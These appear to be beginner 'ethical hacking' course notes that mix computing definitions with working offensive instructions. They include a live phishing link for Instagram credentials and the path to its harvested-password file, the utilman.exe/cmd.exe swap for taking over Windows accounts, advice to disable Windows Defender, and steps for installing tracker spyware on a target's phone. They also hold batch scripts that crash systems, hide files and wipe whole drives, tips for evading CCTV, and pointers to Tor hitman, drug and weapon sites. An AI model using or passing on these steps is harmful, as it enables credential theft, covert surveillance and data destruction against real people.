CSP EH Notes
CSP EH Notes
| What is Hacking ?
To access others DATA or SYSTEM without PERMISSION is called HACKING.
| Types of Hackers
There are THREE types of Hackers : BlackHat, WhiteHat, GreyHat
WhiteHat : Does only LEGAL things, known as Ethical Hacker
BlackHat : Does only ILLEGAL things
GreyHat : They sometimes does LEGAL and sometimes does ILLEGAL things.
Remember types of HACKERS are based on INTENTION of the HACKER.
Skills and Techniques are same with all of THREE.
Just USE of them and intention defines which type of HACKER he or she is.
| What is Software ?
Any digital thing that can make task easier is called SOFTWARE.
System Software :
The software that runs HARDWARE is called SYSTEM SOFTWARE.
Example : OS
Application Software :
Software that is made to do specific task is called APPLICATION SOFTWARE.
Utility Software :
Software that comes PREINSTALLED in OS, which we cannot UNINSTALL is called
UTILITY SOFTWARE.
| What is Hardware ?
Physical components of the COMPUTER is called Computer Hardware.
| Storage Devices : RAM, ROM, HDD, SSD, USB Drive, External HDD
Device that is used to STORE DATA is called STORAGE DEVICE.
| What is Network ?
Group of Computers that SHARE data is called NETWORK.
| What is Server ?
The Computer that provides a SPECIFIC SERVICE is called SERVER.
| What is Client ?
The computer that requests a SERVICE from the SERVER is called CLIENT.
| What is ISP ?
ISP = Internet Service Provider
Whose Internet you are using is called your ISP.
Example : Jio, Vodafone etc.
| IP Address : Local IP Address and Public IP Address
IP = Internet Protocol
Rules :
Never use wifi of your friends
Never use wifi of YOUR CLASS, SCHOOL or COLLAGE
Never use wifi of your NEIGHBOURS
Stay safe from CCTV
| What is Keylogger ?
Keylogger :
It is a software that captures every keystrokes on the computer.
So, If anybody logins to any account, their username and password will be saved
by this software, We can see it.
NOTE :
Most of the hacking softwares are considred as VIRUS.
SO windows defender will PREVENT it.
Windows Defender :
It is a pre installed ANTI VIRUS of windows.
Turn off the WINDOWS DEFENDER.
| Using Phishing
Link for INSTA : cspsec.in/insta/
For Password : cspsec.in/insta/data.txt
| Security ?
Never login from unknown devices
Never give your device to anyone
Set 2FA
Never login from any link
Never REMEMBER PASSWORD in Browsers
05 | WINDOWS HACKING AND SECURITY
| What is Password ?
Key that protects information is called PASSWORD.
| What is SAM ?
SAM = Security Accounts Manager
This file in windows stores password hashes of the Windows OS.
c: [ Enter ]
cd windows/system32 [Enter]
ren utilman.exe util.exe [Enter]
copy cmd.exe utilman.exe [ Enter ]
exit
Now type :
net user
It will show usernames, find the one you want to change the password !
Note : Never set this pass bcoz if you FORGET this, we cannot HACK it!!!
| What is Android ?
Android word means A ROBOT THAT looks like HUMAN.
It is an OPERATING SYSTEM for mobile phones.
Owner of the Android OS is GOOGLE.
| What is Spyware ?
Spyware = Spy + Software
Means a software that is used to SPY on PHONE or COMPUTER.
We will use a SPYWARE to hack targets phone.
File Manager
APK
m.apk > Open this file
Install
Three options Allow
Download app > WIFI > Open >
Allow ? : Yes
Child or Own : Select Any
Agree Next, Agree Next
Login
Settings to allow :) Allow
Activate
Accessibility Service > Go > Security Service : ON
Uninstall app
NEXT
Login
STEP 01 : ID and PASSWORD
Click on SAVE.
mobile-tracker-free.com
Login
| Anonymous Calling
App : IndyCall
| Security ?
Don’t give your phone to anybody for even 2 minutes.
Turn on Play Protect always.
Don’t install apps from Unknown Sources about Hacking.
08 | VIRUS CREATION AND PREVENTION
| What is Virus ?
It is a computer program that damages your DATA or SYSTEM.
There are many type of virus like following :
| What is Trojan ?
It is a virus that controls or spy on remote computer.
| What is Ransomware ?
RansomeWare = Ransom + Software
It is a virus that locks all data on TARGET MOBILE or COMPUTER
To unlock the data, you have to PAY ransom to the HACKER who has created the
VIRUS.
Example : WannaCry and Petya
| System Crasher
This virus will CRASH any windows computer.
:nvirus
start notepad
start cmd
goto nvirus
Solution :
Restart system.
| Data Hider
This virus will HIDE all the data, which DRIVE letter you have written in Code.
attrib +H +R +S /S /D d:/*.*
Solution :
To unhide ?
Just replace + with -
And run the virus again :)
| Data Wiper
This virus will DELETE all the data in the DRIVE you have written in Cod .
del d:\*.| /s /q
| WinLocker
This virus will CHANGE PASSWORED and Log Out the User.
| Security ?
Turn On Windows Defender or Use Anti Virus Program
Never open any unknown file
Test any unknown file on VIRUSTOTAL.COM before executing
09 | WEB ATTACKS AND PREVENTION
| What is Website ?
Website is a collection of webpages about a specific company or business.
| What is Domain ?
Name of the website is called Domain.
Exp:
www.cyberprotectors.info
| What is Hosting ?
The space of server where all files of a website is stored is called Web Hosting.
Exp :
Go Daddy
Big Rock are companies who provide us space for our website.
They charge per year.
| What is Webserver ?
It is a server where websites are stored.
How it Works ?
| DOS Attack
DOS = Denial Of Service
It is a attack that sends lots of request to the website until site crashes.
In this attack only ONE COMPUTER does attack.
| DDOS Attack
DDOS = Distributed Denial of Service
It is an attack that sends lots of requests from multiple computers at once on a
website until site crashes.
In this attack MULTIPLE COMPUTERS are used for attack.
| Security ?
Using DDOS Protection Service
10 | DATA SECURITY
| Disable USB Ports on Your Laptop or Desktop
Tool : Windows USB Blocker
| Hide Drives
Tool : Disk Management [ diskmgmt.msc ]
Steps :
+ R > diskmgmt.msc
Click on drive you want to HIDE
Right click on it and select CHANGE DRIVE LETTER option
Click on REMOVE option
Click on OK OK
Done
| Block Website
Tool : Simple Website Blocker
| Data Backup Policy
Data should be at minimum THREE PLACES :
Your PHONE
Your COMPUTER
Cloud
Steps :
Win+R
Type : firewall.cpl
Check it color is RED here, click on RECOMMENDED SETTINGS.
It will be GREEN.
Green means FIREWAL is ON.
| What is TOR ?
TOR = The Onion Router
It is a NETWORK that can be used to ANONYMOUSLY do surfing and visiting
ANONYMOUS sites.
We need TOR BROWSER.
| History of TOR
CIA used TOR.
| How TOR Works ?
It uses THREE SERVERS to reach the TARGET WEBSITE, So our IP have multiple
layers of Protection.
| Hitmen Service
It is a site from which ONE CAN HIRE… HITMEN.
| Drugs
It is a site from which ONE CAN Buy … DRUGS.
| Weapons
| Bitcoin : Payment Method of TOR